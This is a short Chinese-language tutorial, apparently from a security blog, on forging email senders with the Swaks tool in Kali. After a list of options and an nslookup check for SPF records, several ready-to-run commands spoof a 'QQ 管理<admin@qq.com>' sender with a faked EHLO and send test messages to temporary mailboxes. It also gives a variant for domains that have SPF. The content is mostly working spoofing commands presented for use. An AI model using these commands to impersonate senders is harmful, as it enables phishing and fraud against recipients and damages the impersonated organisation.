目录
[Swaks 简单使用说明:(kali自带)](#Swaks 简单使用说明:(kali自带))
临时邮箱网址:
Swaks 简单使用说明:(kali自带)
-t --to 目标地址 -t test@test.com
-f --from 来源地址 (发件人) -f "text<text@text.com>"
--protocol 设定协议(未测试)
--body "http://www.baidu.com" //引号中的内容即为邮件正文;
--header "Subject:hello" //邮件头信息,subject 为邮件标题
-ehlo 伪造邮件 ehlo 头
--data ./Desktop/email.txt //将 TXT 文件作为邮件发送;
操作流程:
1、检测:
nslookup -type=txt xxx.com
2、伪造:
swaks ...............
无SPF:(直接伪造发信人)
演示1
data:image/s3,"s3://crabby-images/46542/46542f84c1bb7bf30d80ac48e04fdeb935cee731" alt=""
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<admin@qq.com>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to qzmydusmoy@iubridge.com
---直接伪造发信人
data:image/s3,"s3://crabby-images/eba5f/eba5f0d7da58fc2eeded1f0e90445645b77e9ca1" alt=""
演示2
data:image/s3,"s3://crabby-images/bff8d/bff8d1a05aae9c86a790ec6c9135b9e94c7fec67" alt=""
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<admin@qq.com>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to tripjf08516@chacuo.net
data:image/s3,"s3://crabby-images/529f3/529f353750d549c57ec99c6d338eff3c4b99901e" alt=""
演示3
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<admin@qq.com>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to uoysvj84956@027168.com
data:image/s3,"s3://crabby-images/40d0c/40d0cc3b374df5719d5c259322dac3c2523c3a0c" alt=""
有SPF:--演示
data:image/s3,"s3://crabby-images/31805/318053973c015522ec01511501050cce444cc989" alt=""
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to xxxxxxxxx9@163.com
data:image/s3,"s3://crabby-images/95526/95526288fbc5b8d654bf94730335f2109d7a74f4" alt=""
data:image/s3,"s3://crabby-images/2d484/2d48479063f3568282c6573d85ee9172e8eb47a7" alt=""